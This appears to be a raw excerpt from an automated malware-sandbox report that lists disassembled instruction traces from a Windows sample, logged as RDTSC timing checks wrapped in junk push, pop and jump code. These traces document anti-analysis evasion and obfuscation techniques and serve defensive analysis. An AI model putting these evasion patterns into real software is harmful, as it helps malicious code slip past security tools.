                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FAB91 second address: 6FABA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jng 00007F99FD381EF4h 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FCCD0 second address: 6FCCD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FCCD6 second address: 6FCCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jns 00007F99FD381EE6h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FCCE5 second address: 6FCCEA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC872 second address: 6FC87C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F99FD381EE6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC87C second address: 6FC88C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jne 00007F99FCCDC7D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FC88C second address: 6FC890 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01C13 second address: 4A01C17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01C17 second address: 4A01C1D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01C1D second address: 4A01C90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov ecx, edx 0x0000000d movsx ebx, cx 0x00000010 popad 0x00000011 xchg eax, ecx 0x00000012 pushad 0x00000013 movzx esi, dx 0x00000016 jmp 00007F99FCCDC7E7h 0x0000001b popad 0x0000001c call dword ptr [7598188Ch] 0x00000022 mov edi, edi 0x00000024 push ebp 0x00000025 mov ebp, esp 0x00000027 push ecx 0x00000028 mov ecx, dword ptr [7FFE0004h] 0x0000002e mov dword ptr [ebp-04h], ecx 0x00000031 cmp ecx, 01000000h 0x00000037 jc 00007F99FCD0E2B5h 0x0000003d mov eax, 7FFE0320h 0x00000042 mov eax, dword ptr [eax] 0x00000044 mul ecx 0x00000046 shrd eax, edx, 00000018h 0x0000004a mov esp, ebp 0x0000004c pop ebp 0x0000004d ret 0x0000004e jmp 00007F99FCCDC7E6h 0x00000053 pop ecx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F99FCCDC7E7h 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01C90 second address: 4A01AFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 ret 0x0000000a nop 0x0000000b xor esi, eax 0x0000000d lea eax, dword ptr [ebp-10h] 0x00000010 push eax 0x00000011 call 00007F9A0197A25Ah 0x00000016 mov edi, edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov ah, bh 0x0000001d popad 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01AFA second address: 4A01B37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99FCCDC7DEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F99FCCDC7DEh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01B37 second address: 4A01BDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FD381EF1h 0x00000008 mov ax, E007h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov bh, ah 0x00000013 push edi 0x00000014 pushfd 0x00000015 jmp 00007F99FD381EF0h 0x0000001a jmp 00007F99FD381EF5h 0x0000001f popfd 0x00000020 pop esi 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007F99FD381EF8h 0x0000002d sbb ax, 5878h 0x00000032 jmp 00007F99FD381EEBh 0x00000037 popfd 0x00000038 pushfd 0x00000039 jmp 00007F99FD381EF8h 0x0000003e sub cx, 72D8h 0x00000043 jmp 00007F99FD381EEBh 0x00000048 popfd 0x00000049 popad 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0198F second address: 4A0199F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FCCDC7DCh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0199F second address: 4A019AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A019AE second address: 4A019C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A019C1 second address: 4A019FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b call 00007F99FD381EECh 0x00000010 mov ch, C8h 0x00000012 pop edx 0x00000013 call 00007F99FD381EECh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0B31 second address: 49A0B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 198C9ADDh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0B3B second address: 49A0B76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], ebp 0x0000000a jmp 00007F99FD381EF6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99FD381EF7h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0B76 second address: 49A0B7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49A0B7C second address: 49A0B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D06BD second address: 49D0730 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99FCCDC7DEh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov edi, 3F629D84h 0x00000016 call 00007F99FCCDC7DDh 0x0000001b movzx eax, di 0x0000001e pop ebx 0x0000001f popad 0x00000020 xchg eax, ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F99FCCDC7E5h 0x0000002a sub eax, 1BA36626h 0x00000030 jmp 00007F99FCCDC7E1h 0x00000035 popfd 0x00000036 mov di, ax 0x00000039 popad 0x0000003a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0730 second address: 49D0799 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 mov ebx, eax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007F99FD381EEEh 0x00000012 push dword ptr [ebp+04h] 0x00000015 pushad 0x00000016 movzx eax, dx 0x00000019 pushfd 0x0000001a jmp 00007F99FD381EF3h 0x0000001f add esi, 205FEEBEh 0x00000025 jmp 00007F99FD381EF9h 0x0000002a popfd 0x0000002b popad 0x0000002c push dword ptr [ebp+0Ch] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F99FD381EEDh 0x00000036 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D0799 second address: 49D079F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D079F second address: 49D07C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D07C1 second address: 49D07C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D07E0 second address: 49D07E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49D07E5 second address: 49D06BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a jmp 00007F99FCCDC7E6h 0x0000000f retn 0008h 0x00000012 push 00401BF4h 0x00000017 push edi 0x00000018 mov dword ptr [0045F81Ch], eax 0x0000001d call esi 0x0000001f mov edi, edi 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F99FCCDC7DDh 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0AD6 second address: 49B0ADA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0ADA second address: 49B0AE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49B0AE0 second address: 49B0B18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e mov dl, cl 0x00000010 popad 0x00000011 mov ebp, esp 0x00000013 jmp 00007F99FD381EF3h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c movsx edi, cx 0x0000001f popad 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01726 second address: 4A0172A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0172A second address: 4A0172E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0172E second address: 4A01734 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01734 second address: 4A01791 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F99FD381EEBh 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F99FD381EF6h 0x00000015 mov ebp, esp 0x00000017 jmp 00007F99FD381EF0h 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F99FD381EF7h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A01791 second address: 49A0B31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FCCDC7DFh 0x00000008 pushfd 0x00000009 jmp 00007F99FCCDC7E8h 0x0000000e add cx, 9F88h 0x00000013 jmp 00007F99FCCDC7DBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c jmp dword ptr [7598155Ch] 0x00000022 mov edi, edi 0x00000024 push ebp 0x00000025 mov ebp, esp 0x00000027 mov ecx, dword ptr fs:[00000018h] 0x0000002e mov eax, dword ptr [ebp+08h] 0x00000031 mov dword ptr [ecx+34h], 00000000h 0x00000038 cmp eax, 40h 0x0000003b jnc 00007F99FCCDC7DDh 0x0000003d mov eax, dword ptr [ecx+eax*4+00000E10h] 0x00000044 pop ebp 0x00000045 retn 0004h 0x00000048 test eax, eax 0x0000004a je 00007F99FCCDC7F3h 0x0000004c mov eax, dword ptr [00459710h] 0x00000051 cmp eax, FFFFFFFFh 0x00000054 je 00007F99FCCDC7E9h 0x00000056 mov esi, 00401BB4h 0x0000005b push esi 0x0000005c call 00007F9A01274145h 0x00000061 mov edi, edi 0x00000063 pushad 0x00000064 mov di, AC24h 0x00000068 mov ecx, edx 0x0000006a popad 0x0000006b push esp 0x0000006c push eax 0x0000006d push edx 0x0000006e pushad 0x0000006f jmp 00007F99FCCDC7E1h 0x00000074 call 00007F99FCCDC7E0h 0x00000079 pop esi 0x0000007a popad 0x0000007b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990649 second address: 4990696 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F99FD381EEEh 0x0000000f push eax 0x00000010 jmp 00007F99FD381EEBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F99FD381EF0h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990696 second address: 499069A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499069A second address: 49906A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49906A0 second address: 49906E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99FCCDC7DCh 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f jmp 00007F99FCCDC7DCh 0x00000014 mov ecx, dword ptr [ebp+08h] 0x00000017 pushad 0x00000018 pushad 0x00000019 mov eax, 186435F3h 0x0000001e mov dl, al 0x00000020 popad 0x00000021 movsx edi, ax 0x00000024 popad 0x00000025 sub eax, eax 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a mov al, 97h 0x0000002c jmp 00007F99FCCDC7DBh 0x00000031 popad 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49906E6 second address: 49906FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EF4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49906FE second address: 4990718 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b inc eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, edx 0x00000011 push ebx 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990718 second address: 499072B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EEFh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0002C second address: 4A0005C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dl, 90h 0x0000000d push esi 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov ebx, 7DDDA310h 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0005C second address: 4A00062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00062 second address: 4A00066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00066 second address: 4A000B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F99FD381EF3h 0x0000000f mov eax, dword ptr fs:[00000030h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F99FD381EEBh 0x0000001e add ecx, 5C72D61Eh 0x00000024 jmp 00007F99FD381EF9h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000B9 second address: 4A000BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000BF second address: 4A000C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000C3 second address: 4A000C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000C7 second address: 4A000E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 sub esp, 18h 0x0000000b pushad 0x0000000c mov ah, 94h 0x0000000e mov edx, 066C8630h 0x00000013 popad 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F99FD381EEBh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000E9 second address: 4A00183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F99FCCDC7DCh 0x00000013 and ecx, 162FD0D8h 0x00000019 jmp 00007F99FCCDC7DBh 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007F99FCCDC7E8h 0x00000025 or cl, 00000038h 0x00000028 jmp 00007F99FCCDC7DBh 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebx, dword ptr [eax+10h] 0x00000032 jmp 00007F99FCCDC7E6h 0x00000037 xchg eax, esi 0x00000038 jmp 00007F99FCCDC7E0h 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push eax 0x00000041 push edx 0x00000042 push eax 0x00000043 push edx 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00183 second address: 4A00187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00187 second address: 4A0018D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0018D second address: 4A001DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99FD381EF5h 0x00000009 jmp 00007F99FD381EEBh 0x0000000e popfd 0x0000000f mov bx, ax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007F99FD381EF0h 0x0000001d and cl, FFFFFF88h 0x00000020 jmp 00007F99FD381EEBh 0x00000025 popfd 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001DE second address: 4A001E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001E2 second address: 4A0021E instructions: 0x00000000 rdtsc 0x00000002 call 00007F99FD381EF4h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov esi, dword ptr [759B06ECh] 0x00000011 pushad 0x00000012 movsx edi, si 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F99FD381EF6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0021E second address: 4A00262 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F99FCCDC7E9h 0x00000013 and eax, 5E75EB66h 0x00000019 jmp 00007F99FCCDC7E1h 0x0000001e popfd 0x0000001f mov cx, 5F97h 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00262 second address: 4A00268 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00268 second address: 4A0026C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0026C second address: 4A002CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F99FD382DCAh 0x0000000e jmp 00007F99FD381EEBh 0x00000013 xchg eax, edi 0x00000014 jmp 00007F99FD381EF6h 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F99FD381EEDh 0x00000021 and cx, ACD6h 0x00000026 jmp 00007F99FD381EF1h 0x0000002b popfd 0x0000002c popad 0x0000002d xchg eax, edi 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002CB second address: 4A002DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002DE second address: 4A002F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99FD381EF4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002F6 second address: 4A00334 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call dword ptr [75980B60h] 0x00000011 mov eax, 75F3E5E0h 0x00000016 ret 0x00000017 jmp 00007F99FCCDC7E6h 0x0000001c push 00000044h 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F99FCCDC7DCh 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00334 second address: 4A00355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F99FD381EF0h 0x0000000b push ecx 0x0000000c pop edi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00355 second address: 4A00359 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00359 second address: 4A0035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00474 second address: 4A004A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FCCDC7E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F9A6DC0B9F3h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F99FCCDC7E0h 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004A5 second address: 4A004B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99FD381EEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004B4 second address: 4A004F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F99FCCDC7DFh 0x00000009 add cl, FFFFFFEEh 0x0000000c jmp 00007F99FCCDC7E9h 0x00000011 popfd 0x00000012 mov ch, 53h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004F4 second address: 4A004F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004F8 second address: 4A004FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
